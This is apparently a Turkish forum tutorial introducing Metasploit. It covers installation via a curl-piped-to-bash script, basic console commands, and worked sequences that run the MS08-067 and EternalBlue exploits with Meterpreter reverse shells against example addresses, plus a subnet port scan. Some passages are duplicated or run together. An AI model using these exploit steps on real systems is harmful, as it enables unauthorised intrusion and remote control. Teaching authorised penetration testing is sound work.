Metasploit, siber güvenlik uzmanları ve etik hackerlar tarafından kullanılan güçlü bir araçtır. Bu rehberde, Metasploit’in temel işlevlerini ve nasıl kullanılacağını adım adım ele alacağız.
-----------------------------------------------------------------------------------------------
Not : Metasploit güçlü bir araçtır ve etik kullanımı önemlidir. Araçları sadece izinli testlerde ve etik kurallara uygun olarak kullanmalısınız. İzinsiz erişim veya saldırı yapmak yasadışıdır ve ciddi yasal sonuçlar doğurabilir.
1. Metasploit’i Kurma
Metasploit'i kullanmaya başlamadan önce, kurulum yapmanız gerekmektedir. Genellikle, Metasploit Framework Kali Linux gibi siber güvenlik odaklı dağıtımlarla birlikte gelir. Ancak, Windows veya diğer Linux dağıtımlarında da kurabilirsiniz.
Kali Linux: Metasploit genellikle Kali Linux ile birlikte gelir. Terminali açıp msfconsole komutunu kullanarak başlatabilirsiniz.
Diğer Linux Dağıtımları ve Windows:
Kali Linux: Metasploit genellikle Kali Linux ile birlikte gelir. Terminali açıp msfconsole komutunu kullanarak başlatabilirsiniz.
Diğer Linux Dağıtımları ve Windows:
Kod:
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfupdate | bash2. Metasploit’i Başlatma
Kurulumdan sonra, Metasploit’i başlatmak için terminalde şu komutu kullanın:
Bu, Metasploit komut satırı arayüzünü başlatır.
Kod:
msfconsole
3. Temel Komutlar
Metasploit’de kullanabileceğiniz bazı temel komutlar şunlardır:
search: Belirli bir zafiyet veya exploit bulmak için kullanılır.
use: Belirli bir modülü seçmek için kullanılır.
show options: Seçilen modülün yapılandırma seçeneklerini gösterir.
set: Modül için seçenekleri ayarlamak için kullanılır.
exploit: Seçilen exploit’i çalıştırır.
search: Belirli bir zafiyet veya exploit bulmak için kullanılır.
Kod:
search <araştırmak istediğiniz terim>use: Belirli bir modülü seçmek için kullanılır.
Kod:
use <modül adı>show options: Seçilen modülün yapılandırma seçeneklerini gösterir.
Kod:
show optionsset: Modül için seçenekleri ayarlamak için kullanılır.
Kod:
set <seçenek> <değer>exploit: Seçilen exploit’i çalıştırır.
Kod:
exploit4. Basit Bir Exploit Kullanımı
Örnek olarak, bir Windows hedefine basit bir exploit uygulayalım. Burada, windows/smb/ms08_067_netapi modülünü kullanacağız.
Modülü Seçin:
Modül Seçeneklerini Görüntüleyin:
Gerekli Seçenekleri Ayarlayın:
Exploit’i Çalıştırın:
Modülü Seçin:
Kod:
use exploit/windows/smb/ms08_067_netapiModül Seçeneklerini Görüntüleyin:
Kod:
show optionsGerekli Seçenekleri Ayarlayın:
Kod:
set RHOST <hedef IP adresi>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <saldırgan IP adresi>Exploit’i Çalıştırın:
Kod:
exploit5. Kullanım Örnekleri ve Kodlar
İşte Metasploit kullanarak temel bir exploit örneği:
Bilgi Toplama İçin:
Kod:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.101
exploitBilgi Toplama İçin:
Kod:
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set THREADS 10
run-----------------------------------------------------------------------------------------------
Not : Metasploit güçlü bir araçtır ve etik kullanımı önemlidir. Araçları sadece izinli testlerde ve etik kurallara uygun olarak kullanmalısınız. İzinsiz erişim veya saldırı yapmak yasadışıdır ve ciddi yasal sonuçlar doğurabilir.